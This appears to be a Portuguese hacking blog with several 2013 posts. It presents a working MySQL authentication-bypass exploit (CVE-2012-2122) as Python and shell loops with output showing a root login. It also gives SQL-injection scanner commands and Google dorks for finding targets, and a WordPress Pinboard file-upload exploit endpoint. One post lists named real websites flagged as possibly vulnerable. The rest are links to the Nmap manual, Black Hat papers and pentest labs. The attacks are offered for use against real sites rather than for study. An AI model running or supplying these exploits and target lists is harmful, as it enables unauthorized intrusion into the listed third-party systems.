sexta-feira, 29 de novembro de 2013

Conheça MySQL Authentication Bypass Exploit.


Conheça MySQL Authentication Bypass Exploit.


MySQL permite a autenticação de qualquer usuário válido (ou seja, root ativos em 99% das instalações) sem a necessidade de senha, utilizando apenas um simples LOOP  de tentativas exaustivo de conexões.

Todas as versões do MySQL e MariaDB até 5.1.61, 5.2.11, 5.3.5, 5.5.22 são vulnerável.
Versões de MariaDB 5.1.62, 5.2.12, 5.3.6, 5.5.23 não são.
Versões do MySQL 5.1.63 de, 5.5.24, 5.6.6 não são.

Esta questão foi atribuído um ID:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2122

O que significa que, se alguém sabe um nome de usuário para se conectar (e "root" quase sempre existe), ela pode se conectar usando * qualquer senha * repetindo tentativas de conexão. ~ 300 tentativas leva apenas uma fração de segundo, então basicamente conta a proteção por senha é tão bom como inexistente.

Qualquer cliente vai fazer, não há necessidade de uma biblioteca libmysqlclient especial.

EXPLOIT CÓDIGO PYTHON:

#!/usr/bin/python
import subprocess

  1. import subprocess
  2.  
  3. ipaddr = raw_input("Enter the IP address of the mysql server: ")
  4.  
  5. while 1:
  6.     subprocess.Popen("mysql --host=%s -u root mysql --password=blah" % (ipaddr), shell=True).wait()


EXPLOIT CÓDIGO EM SHELLSCRIPT:

while true; do mysql -u root --password=senha -h 127.0.0.1 2>/dev/null; done


Executando comando exploit em python:

google@inurl:~# python mysql.py
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)

Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 24598
Server version: 5.1.62-0ubuntu0.11.10.1 (Ubuntu)

Copyright (c) 2000, 2011, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the current input statement.

mysql>

Exploit:
PYTHON
http://pastebin.com/JuHZX7zJ
PHP
http://pastebin.com/CTYx2hUt

Darknets e servidores ocultos: Identificar a verdadeira identidade IP. Rede I2P

ARTIGO FEITO POR: Adrian Crenshaw
Apresentado no evento BLACK HAT DC 2011 


ARTIGO FEITO POR: Adrian Crenshaw Apresentado no evento BLACK HAT DC 2011


Este artigo irá apresentar a pesquisa em serviços hospedados internamente no I2P
rede anonimato , com foco em I2P hospedado sites conhecidos como eepSites , e como o
verdadeira identidade do anfitrião Internet fornecendo o serviço pode ser identificado por meio de informações vazamentos na camada de aplicação . Ao saber a identidade do host da Internet fornecendo o serviço , o conjunto de anonimato da pessoa ou grupo que administra o serviço pode ser grandemente reduzida , se não completamente eliminado .

O objetivo principal deste trabalho será o de testar a anonimato fornecido pela I2P para hospedagem
eepSites , concentrando-se principalmente na camada e aplicação erros administradores e desenvolvedores
podem fazer que poderia expor um prestador de serviços de identidade ou reduzir os conjunto1 anonimato eles fazem parte. Vamos mostrar os ataques com base em a interseção de usuários I2P hospedagem
eepSites em IPs públicos com hospedagem virtual, o uso de aplicação web comum vulnerabilidades para revelar o voltado para a Internet IP de um eepSite , bem como em geral a informação que pode ser recolhida, relativa os nós participantes do anonimato I2P rede .
introdução :

I2P2 é uma Darknet distribuído usando o modelo mixnet , de certa forma semelhante ao Tor, mas especializada no fornecimento interno serviços em vez de out- proxy para o Internet em geral. O nome I2P foi original 1 Um conjunto anonimato é o número total de possíveis candidatos para a identidade de um entidade .
Reduzindo os meios set anonimato que você pode diminuir os suspeitos.
2 Todos os detalhes de como I2P é implementado pode
ser encontrado em:

abreviação de " Invisível Internet Project", embora raramente é referido por esta longa
formar mais. Ele destina-se a actuar como um rede sobreposta no topo da Internet pública
adicionar anonimato e segurança. 


Um objetivo secundário seria a de permitir a identificação de certos grupos que a aplicação da lei pode ser
interessado na localização, especificamente pedófilos.
Essas metas são um pouco em probabilidades , uma vez que a aplicação da lei poderia usar o conhecimento para perseguir grupos para outro razões, e pedófilos poderia usar o conhecimento para ajudar a esconder-se, nem de que são desejados objetivos, mas com privacidade assuntos às vezes você tem que tomar a mal com o bem .
I2P foi escolhido como o plataforma já que menos pesquisa tem ido para ele versos Tor, mas muitas das mesmas idéias e técnicas deve ser aplicável tanto como sistemas que oferecem funcionalidade
semelhante quando se trata de serviços ocultos, que são HTTP baseado.

Artigo:
https://media.blackhat.com/bh-dc-11/Crenshaw/BlackHat_DC_2011_Crenshaw_Identifying_the_true_IP-wp.pdf

Curso OYS – [ Análise e Testes de Vulnerabilidades em Redes Corporativas ]

Curso OYS –  [ Análise e Testes de Vulnerabilidades em Redes Corporativas ]


Introdução à Segurança da Informação
Introdução ao Teste de Invasão e Ética Hacker
Google Hacking
Levantamento de Informações
Entendendo a Engenharia Social e o No-Tech Hacking
Varreduras ativas, passivas e furtivas de rede
Enumeração de informações e serviços
Trojans, Backdoors, Vírus, Rootkits e Worms
Ignorando Proteções
Técnicas de Força Bruta
Vulnerabilidades em aplicações web
SQL Injection
Elevação de Privilégios Locais
Testando o sistema
Smurf Attack
Técnicas de Sniffing
Exploits
Ataques a Servidores WEB
Metasploit Framework

Tamanho: 5,71 GB
[ 6 ] PARTES:
http://goo.gl/5G3dI7
http://goo.gl/NhjsSj
http://goo.gl/dCCSxr
http://goo.gl/LlQVpq
http://goo.gl/jkYALy
http://goo.gl/2ylqKV

$fonte::::: https://twitter.com/Cr4t3r

Está protegido ? conheça o open-source "ferret"


Está protegido ?
Você pode olhar para o open-source "ferret".
Ele analisa um monte de e-mail diferente (SMTP, POP, IMAP) e protocolos de bate-papo (MSN, Yahoo e AOL).


Você pode olhar para o open-source "ferret". Ele analisa um monte de e-mail diferente (SMTP, POP, IMAP) e protocolos de bate-papo (MSN, Yahoo e AOL).
Foi escrito em 2007. É improvável que qualquer engenheiro NSA tenha escrito algum código semelhante.
Além disso, o código é muito rápido, ele pode ser executado em razoável
ligações multi-gigabit - o tipo que você encontraria em torneiras subaquáticas de links de fibra óptica.


Foi escrito em 2007. É improvável que qualquer engenheiro NSA tenha escrito algum código semelhante. Além disso, o código é muito rápido, ele pode ser executado em razoável ligações multi-gigabit - o tipo que você encontraria em torneiras subaquáticas de links de fibra óptica.



Fonte:
http://www.blackhat.com/presentations/bh-dc-07/Maynor_Graham/Presentation/bh-dc-07-Maynor_Graham-up.pdf

Repositório oficial do SCANNER INURL

Repositório oficial do SCANNER INURL

Repositório oficial do SCANNER INURL.
Scanner INURL utiliza motor de busca Google para achar seus alvos.

O projeto SCANNER INURL com interface web será descontinuado.
Assim dando mais foco ao Scanner em linha de comando.

BUSCA POSSÍVEIS VULNERABILIDADES

SQLI(MySQL,MS ACCESS,Microsoft SQL Server,ORACLE,POSTGRESQL) OU ERROS DE PROGRAMAÇÃO.

OPÇÕES PARA SETAR PROXY.

MUDAR O MOTOR DE BUSCA GOOGLE 202 DISPONÍVEIS.

SETAR EXPLOIT.

PERSONALIZAR PROCURA DE ERROS DENTRO DE CADA URL ENCONTRADA.

GRUPO GOOGLEINURL BRASIL - PESQUISA AVANÇADA.

Repositório:
https://code.google.com/p/scanner-inurl/

quarta-feira, 27 de novembro de 2013

Usando SCANNER INURL para encontrar falhas / Mybb Ajaxfs Plugin Sql Injection vulnerability.

Usando o [ SCANNER INURL 1.0 CONSOLE ], para encontrar erros "Mybb Ajaxfs Plugin Sql Injection vulnerability".

MyBB (MyBulletinBoard) é um software de sistema de fóruns (bulletin board system) desenvolvido pelo grupo MyBB, é escrito utilizando as linguagens PHP e MySQL, está licenciado como um software livre sob uma GNU Lesser General Public License.

Para explorar a falha no plugin Ajaxfs devemos efetuar uma busca, mas vamos usar
SCANNER INURL CONSOLE.

Download SCANNER INURL CONSOLE:
https://code.google.com/p/scanner-inurl/

Dork[1]::: inurl:ajaxfs.php?tooltip=
Dork[2]::: inurl:ajaxfs.php
Dork[3]::: inurl:/ajaxfs ext:php 

Entenda a falha:
http://pastebin.com/XyDrh5SG

Configurando para o scan.
Comando:
php botConsole.php --host='www.google.com.br' --dork="inurl:ajaxfs.php?tooltip=" --arquivo='resultado.txt' --tipoerro='1' --exploit="'\--0x27;"

php botConsole.php --host='www.google.com.br' --dork="inurl:ajaxfs.php?tooltip=" --arquivo='resultado.txt' --tipoerro='1' --exploit="'\--0x27;"


Executando

Executando SCANNER INURL





Dorks captura de informações server's

Dorks captura de informações server's

DORKS:
comment:Pages containing network or vulnerability data***-----
filetype:log intext:"ConnectionManager2"
"apricot - admin" 00h
"Network Host Assessment Report" "Internet Scanner"
"Output produced by SysWatch *"
"Phorum Admin" "Database Connection" inurl:forum inurl:admin
"Powered by phpOpenTracker" Statistics
"powered | performed by Beyond Security's Automated Scanning" -kazaa -example
"SnortSnarf alert page"
"This file was generated by Nessus"
"this proxy is working fine!" "enter *" "URL***" * visit
"This report lists" "identified by Internet Scanner"
"Traffic Analysis for" "RMON Port * on unit *"
"Version Info" "Boot Version" "Internet Settings"
((inurl:ifgraph "Page generated at") OR ("This page was built using ifgraph"))
ACID "by Roman Danyliw" filetype:php -----Analysis Console for Incident Databases 12-Jul-2004 866-----
ext:cfg radius.cfg
ext:cgi intext:"nrg-" " This web page was created on "
filetype:pdf "Assessment Report" nessus
filetype:php inurl:ipinfo.php "Distributed Intrusion Detection System"
filetype:php inurl:nqt intext:"Network Query Tool"
filetype:vsd vsd network -samples -examples
intext:"Welcome to the Web V.Networks" intitle:"V.Networks [Top]" -filetype:htm
intitle:"ADSL Configuration page"
intitle:"Azureus : Java BitTorrent Client Tracker"
intitle:"BNBT Tracker Info"
intitle:"Microsoft Site Server Analysis"
intitle:"PHPBTTracker Statistics" | intitle:"PHPBT Tracker Statistics"
intitle:"start.managing.the.device" remote pbx acc
intitle:"sysinfo * " intext:"Generated by Sysinfo * written by The Gamblers."
intitle:"twiki" inurl:"TWikiUsers"
inurl:"/catalog.nsf" intitle:catalog
inurl:"install/install.php"
inurl:"map.asp?" intitle:"WhatsUp Gold"
inurl:"sitescope.html" intitle:"sitescope" intext:"refresh" -demo
inurl:/adm-cfgedit.php
inurl:/cgi-bin/finger? "In real life"
inurl:/cgi-bin/finger? Enter (account|host|user|username)
inurl:phpSysInfo/ "created by phpsysinfo"
inurl:portscan.php "from Port"|"Port Range"
inurl:statrep.nsf -gov
inurl:testcgi xitami
inurl:webutil.pl
"Looking Glass" (inurl:"lg/" | inurl:lookingglass) -----Looking Glass-----
intitle:That.Site.Running Apache

[ SCANNER INURLBR / TERMINAL. ]


Mais uma ferramenta para os dorkeiros de plantão.


* SCANNER INURLBR 1.0
* PHP Version 5.4.7
* php5-curl LIB
* cURL support enabled
* cURL Information 7.24.0
* Apache 2.4
* allow_url_fopen = On
* Motor de busca GOOGLE
* Permissão Leitura & Escrita
* BUSCA POSSÍVEIS VULNERABILIDADES
* SQLI(MySQL,MS ACCESS,Microsoft SQL Server,ORACLE,POSTGRESQL) OU ERROS DE PROGRAMAÇÃO.
* OPÇÕES PARA SETAR PROXY.
* MUDAR O MOTOR DE BUSCA GOOGLE 202 DISPONÍVEIS.
* SETAR EXPLOIT.
* PERSONALIZAR PROCURA DE ERROS DENTRO DE CADA URL ENCONTRADA.
* GRUPO GOOGLEINURL BRASIL - PESQUISA AVANÇADA.
* fb.com/GoogleINURL
* twitter.com/GoogleINURL
* blog.inurl.com.br

--host='www.google.com.br'
--dork='sua dork'
--arquivo='seusResultados.txt'
--tipoerro='1 ou 2'
--exploit='O que vai ser injetado no final de cada url'
--achar='Funciona com Tipoerro 2 para procurar strings personalizadas em cada URL' 
--ipproxy='IP PROXY EX: 172.16.0.150' 
--porta='PORTA do proxy'

O PARÂMETRO --tipoerro tem duas opções:
1 - O Scanner vai procurar erros padrões do script SQLI(MySQL,MS ACCESS,Microsoft SQL Server,ORACLE,POSTGRESQL) OU ERROS DE PROGRAMAÇÃO.
O mesmo vinculado com seu EXPLOIT que pode ser deixado vazio --exploit='' o exploit sempre será usado no final das urls,Padrão básico
sqlinjection.
2 - Opção para personalizar sua execução onde é habilitado o parâmetro --achar='',Achar funciona para procurar sua definição dentro das urls encontradas.
Ex[1]: --achar='WordPress' isso vai procurar a palavra WordPress em todas urls encontradas pelo scanner.
Ex[2]: --tipoerro='2' --exploit='wp-login.php' --achar='WordPress'\r"; 

Exemplos de uso.
Comando:
php botConsole.php  --host='www.google.co.bw' --dork='site:br inurl:/wp-content/themes/ "Index of /"' --arquivo='resultado.txt' --tipoerro='2' --exploit='' --achar='Index of'
[ SCANNER INURLBR / TERMINAL. ] php botConsole.php  --host='www.google.co.bw' --dork='site:br inurl:/wp-content/themes/ "Index of /"' --arquivo='resultado.txt' --tipoerro='2' --exploit='' --achar='Index of'


Comando:
php botConsole.php ajuda
php botConsole.php ajuda


Comando:
php botConsole.php hosts
php botConsole.php hosts


Baixar: https://code.google.com/p/scanner-inurl/

Guia de Referência do Nmap (Página do Manual)


Guia de Referência do Nmap (Página do Manual)


O Nmap (“Network Mapper”) é uma ferramenta de código aberto para exploração de rede e auditoria de segurança. Ela foi desenhada para escanear rapidamente redes amplas, embora também funcione muito bem contra hosts individuais. O Nmap utiliza pacotes IP em estado bruto (raw) de maneira inovadora para determinar quais hosts estão disponíveis na rede, quais serviços (nome da aplicação e versão) os hosts oferecem, quais sistemas operacionais (e versões de SO) eles estão executando, que tipos de filtro de pacotes/firewalls estão em uso, e dezenas de outras características. Embora o Nmap seja normalmente utilizado para auditorias de segurança, muitos administradores de sistemas e rede consideram-no útil para tarefas rotineiras tais como inventário de rede, gerenciamento de serviços de atualização agendados, e monitoramento de host ou disponibilidade de serviço.

A saída do Nmap é uma lista de alvos escaneados, com informações adicionais de cada um dependendo das opções utilizadas. Uma informação chave é a “tabela de portas interessantes”. Essa tabela lista o número da porta e o protocolo, o nome do serviço e o estado. O estado pode ser aberto (open), filtrado (filtered), fechado (closed), ou não-filtrado (unfilterd). Aberto (open) significa que uma aplicação na máquina-alvo está escutando as conexões/pacotes naquela porta. Filtrado (filtered) significa que o firewall, filtro ou outro obstáculo de rede está bloqueando a porta de forma que o Nmap não consegue dizer se ela está aberta (open) ou fechada (closed). Portas fechadas (closed)não possuem uma aplicação escutando nelas, embora possam abrir a qualquer instante. Portas são classificadas como não filtradas (unfiltered)quando elas respondem às sondagens do Nmap, mas o Nmap não consegue determinar se as portas estão abertas ou fechadas. O Nmap reporta as combinações aberta|filtrada (open|filtered)e fechada|filtrada (closed|filtered)quando não consegue determinar qual dos dois estados descrevem melhor a porta. A tabela de portas também pode incluir detalhes de versão de software quando a detecção de versão for solicitada. Quando um scan do protocolo IP é solicitado (-sO), o Nmap fornece informações dos protocolos IP suportados ao invés de portas que estejam abertas.

Além da tabela de portas interessantes, o Nmap pode fornecer informações adicionais sobre os alvos, incluíndo nomes de DNS reverso, possível sistema operacional, tipos de dispositivos e endereços MAC.

Um scan típico do Nmap é mostrado em Example 1, “Uma amostra de scan do Nmap”. Os únicos argumentos que o Nmap utiliza nesse exemplo são -A, para habilitar a detecção de SO e a versão, -T4 para execução mais rápida, e os hostnames de dois alvos.
::::Guia de Referência::::
Notas da Tradução
Sumário das Opções
Especificação de Alvo
Descoberta de Hosts
Fundamentos do Escaneamento de Portas
Técnicas de Escaneamento de Portas
Especificação de Portas e Ordem de Scan
Detecção de Serviço e Versão
Detecção de SO
Temporização (Timing) e Desempenho
Evitando e enganando o Firewall/IDS
Saída (Output)
Opções Diversas (Miscelânea)
Interação em Tempo de Execução
Exemplos
Bugs
Autor

Dominando Nmap Scripting Engine.

Dominando Nmap Scripting Engine.

• NSE Intro & Usage
• Large-scale Scan #1: SMB/MSRPC
• Large-scale Scan #2: Favicon
• Writing NSE Scripts
• Live Script Writing Demo
• Nmap News
• Final Notes & Q/A.

http://nmap.org/presentations/BHDC10/Fyodor-David-BlackHatUSA-2010-Slides.pdf

terça-feira, 26 de novembro de 2013

Wordpress Themes Pinboard Arbitrary File Upload Vulnerability

BUG WP THEMES PINBOARD


EXPLOIT WP ~~~
#Author : ReC0ded
#Vendor : http://themify.me/
#Download : http://themify.me/themes/Pinboard
#Date : 22, November 2013.
#Type : php, html, htm, asp, etc.
#Category : Web Applications
#Vulnerability : File Upload


#Dork[1] : inurl:/wp-content/themes/pinboard/
#Dork[2] : inurl:site:br /themes/pinboard/
 #Dork[3] : inurl:/themes/pinboard/ ext:php

Falha:
#Exploit : http://SITEWPVULL.COM.BR/{PASTA}/wp-content/themes/pinboard/themify/themify-ajax.php

ARQUIVO UPADO:

http://SITEWPVULL.COM.BR/{PASTA}/wp-content/themes/pinboard/uploads/{ARQUIVO}.php


EXPLOIT UPLOAD:http://pastebin.com/FwSP3bQT

sexta-feira, 22 de novembro de 2013

Usando SCANNER INURL para encontrar Vull's WP

EXPLOIT
Wordpress Amplus Theme - CSRF Vulnerability
Wordpress Amplus Theme - CSRF Vulnerability
RESULTADO
Usando SCANNER INURL Wordpress Amplus Theme - CSRF Vulnerability

BOT - SCANNER PRIV8 / - INURLBR

TOTAL DE URL's: 86

EXPLOIT USADO:

DORK: inurl:/themes/amplus/
ENCONTRAR: /amplus/scripts/
TOTAL DE POSSÍVEIS VULL: 37
ARQUIVO COM RESULTADO: resultados.txt

LISTA:


http://washingtonavenuecommons.com/wp-content/themes/amplus/scripts/prettyphoto/
http://washingtonavenuecommons.com/wp-content/themes/amplus/scripts/prettyphoto/images/prettyPhoto/
http://washingtonavenuecommons.com/wp-content/themes/amplus/scripts/prettyphoto/images/backgrounds/
http://telplus-inc.com/blog/wp-content/themes/amplus/scripts/
http://www.intuneautoworks.com/home/wp-content/themes/amplus/scripts/
http://www.intuneautoworks.com/home/wp-content/themes/amplus/scripts/syntaxhighlighter/
http://www.intuneautoworks.com/home/wp-content/themes/amplus/scripts/fonts/
www.intuneautoworks.com/home/wp.../
http://www.intuneautoworks.com/home/wp-content/themes/amplus/scripts/prettyphoto/
http://wnglaw.com/wp-content/themes/amplus/scripts/prettyphoto/
http://wnglaw.com/wp-content/themes/amplus/scripts/fonts/
http://wnglaw.com/wp-content/themes/amplus/scripts/syntaxhighlighter/
http://punc.psiada.org/wp-content/themes/amplus/scripts/syntaxhighlighter/scripts/
http://amaboston.org/wp-content/themes/amplus/scripts/syntaxhighlighter/styles/
http://www.avia-sys.com/wp-content/themes/amplus/scripts/syntaxhighlighter/scripts/
http://www.promisenaturalfoodsandbakery.com/wp-content/themes/amplus/scripts/prettyphoto/images/prettyPhoto/
http://light-eco-distribution.com/wp-content/themes/amplus/scripts/prettyphoto/js/
http://www.gettysburgfarmmarket.com/home/wp-content/themes/amplus/scripts/syntaxhighlighter/
http://www.gettysburgfarmmarket.com/home/wp-content/themes/amplus/scripts/prettyphoto/images/prettyPhoto/light_square/
http://www.dominiquediprima.com/wellness/wp-content/themes/amplus/scripts/fonts/
http://ringhello.co.uk/wp-content/themes/amplus/scripts/prettyphoto/
http://www.theglobalwarmingfoundation.org/wp-content/themes/amplus/scripts/syntaxhighlighter/styles/
www.theglobalwarmingfoundation.org/wp.../
http://www.kidzrchampions2.com/wp-content/themes/amplus/scripts/prettyphoto/images/thumbnails/
www.kidzrchampions2.com/wp.../
http://www.buc-holland.com/wp-content/themes/amplus/css/
http://training.dontsayno.in/wp-content/themes/amplus/amplus_v1.6/scripts/prettyphoto/
http://192.185.16.232/~wnglaw/wp-content/themes/amplus/scripts/prettyphoto/
http://192.185.16.232/~wnglaw/wp-content/themes/amplus/scripts/syntaxhighlighter/
http://192.185.16.232/~wnglaw/wp-content/themes/amplus/scripts/prettyphoto/css/
http://192.185.16.232/~wnglaw/wp-content/themes/amplus/scripts/prettyphoto/js/
http://www.laroccaallevamento.it/site/wp-content/themes/amplus/scripts/
http://www.laroccaallevamento.it/site/wp-content/themes/amplus/scripts/prettyphoto/js/
http://www.laroccaallevamento.it/site/wp-content/themes/amplus/scripts/prettyphoto/images/prettyPhoto/dark_square/
http://www.gambit.ph/themes/amplus
http://takeadriver.nl/wp-content/themes/amplus/scripts/syntaxhighlighter/scripts/
http://www.friendslookup.com/wp-content-themes-amplus-functions-timthumb


Exploit: http://www.exploit-db.com/exploits/29669/

segunda-feira, 11 de novembro de 2013

Exercícios são baseados em vulnerabilidades comuns encontrados em sistemas.


0xESTUDOS 0xPENTEST


Os Exercícios são baseados em vulnerabilidades comuns encontrados em sistemas diferentes. As questões não são emulados. Nós fornecemos-lhe sistemas reais com vulnerabilidades reais.

Faça o download do ISO eo PDF. Inicie o ISO usando qualquer software de virtualização e começar a aprender!

WEB FOR PENTESTER II
http://files.pentesterlab.com/web_for_pentester_II/web_for_pentester_II.pdf

FROM SQL INJECTION TO SHELL II
http://files.pentesterlab.com/from_sqli_to_shell_II/from_sqli_to_shell_II.pdf

CVE-2012-6081: MOINMOIN CODE EXECUTION
http://files.pentesterlab.com/cve-2012-6081/cve-2012-6081.pdf

WEB FOR PENTESTER
http://files.pentesterlab.com/web_for_pentester/web_for_pentester.pdf


AXIS2 AND TOMCAT MANAGER
http://files.pentesterlab.com/axis2_and_tomcat_manager/axis2_and_tomcat_manager.pdf


CVE-2008-1930: Wordpress 2.5 Cookie Integrity Protection Vulnerability
http://files.pentesterlab.com/cve-2008-1930/cve-2008-1930.pdf


From SQL injection to Shell: PostgreSQL edition
http://files.pentesterlab.com/from_sqli_to_shell_pg_edition/from_sqli_to_shell_pg_edition.pdf

Rack Cookies and Commands Injection
http://files.pentesterlab.com/rack_cookies_and_commands_injection/rack_cookies_and_commands_injection.pdf


Introduction to Linux Host Review
http://files.pentesterlab.com/linux_host_review/linux_host_review.pdf

CVE-2012-2661: ActiveRecord SQL injection
http://files.pentesterlab.com/cve-2012-2661/cve-2012-2661.pdf

CVE-2012-1823: PHP CGI
http://files.pentesterlab.com/cve-2012-1823/cve-2012-1823.pdf


PHP Include And Post Exploitation
http://files.pentesterlab.com/php_include_and_post_exploitation/php_include_and_post_exploitation.pdf


From SQL injection to Shell
http://files.pentesterlab.com/from_sqli_to_shell/from_sqli_to_shell.pdf

Principal: https://www.pentesterlab.com/exercises/